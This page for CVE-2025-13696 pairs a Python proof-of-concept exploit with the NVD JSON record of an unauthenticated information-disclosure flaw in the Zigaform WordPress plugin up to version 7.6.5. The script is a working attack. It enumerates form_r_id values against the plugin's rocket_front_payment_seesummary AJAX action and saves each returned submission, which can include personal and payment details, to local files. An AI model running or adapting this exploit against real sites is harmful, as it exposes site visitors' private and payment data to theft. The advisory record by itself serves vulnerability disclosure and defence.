CVE-2025-13696

import requests # CVE-2025-13696 PoC - Zigaform IDOR Information Disclosure # Target: WordPress site with Zigaform plugin <= 7.6.5 TARGET_URL = "https://example.com/wp-admin/admin-ajax.php" def exploit_zigaform_idor(): print("[*] CVE-2025-13696 - Zigaform IDOR Information Disclosure") print("[*] Target: " + TARGET_URL) # Iterate through form_r_id values to extract submissions for form_id in range(1, 100): params = { "action": "rocket_front_payment_seesummary", "form_r_id": str(form_id) } try: response = requests.get(TARGET_URL, params=params, timeout=10) if response.status_code == 200 and response.text.strip(): print(f"\n[!] Found submission with form_r_id={form_id}") print(f"[+] Response length: {len(response.text)} bytes") print(f"[+] Raw response:\n{response.text[:500]}") # Save to file for analysis with open(f"submission_{form_id}.json", "w") as f: f.write(response.text) print(f"[+] Saved to submission_{form_id}.json") except requests.RequestException as e: print(f"[-] Request failed for form_r_id={form_id}: {e}") continue if __name__ == "__main__": exploit_zigaform_idor()

{"cve": {"id": "CVE-2025-13696", "sourceIdentifier": "[email protected]", "published": "2025-12-02T08:16:00.490", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Zigaform plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 7.6.5. This is due to the plugin exposing a public AJAX endpoint that retrieves form submission data without performing authorization checks to verify ownership or access rights. This makes it possible for unauthenticated attackers to extract sensitive form submission data including personal information, payment details, and other private data via the rocket_front_payment_seesummary action by enumerating sequential form_r_id values."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://github.com/Softdiscover/Zigaform-WP-Cost-Estimator-Lite/commit/f129d8dd1fb3ab0535c7eb18d52fc49141ab36c8", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/zigaform-calculator-cost-estimation-form-builder-lite/tags/7.6.5/modules/formbuilder/controllers/uiform-fb-controller-frontend.php#L106", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/zigaform-calculator-cost-estimation-form-builder-lite/trunk/modules/formbuilder/controllers/uiform-fb-controller-frontend.php#L106", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3406507%40zigaform-calculator-cost-estimation-form-builder-lite&new=3406507%40zigaform-calculator-cost-estimation-form-builder-lite&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/47f9a466-2826-4835-b06e-14cf4ceb7567?source=cve", "source": "[email protected]"}]}}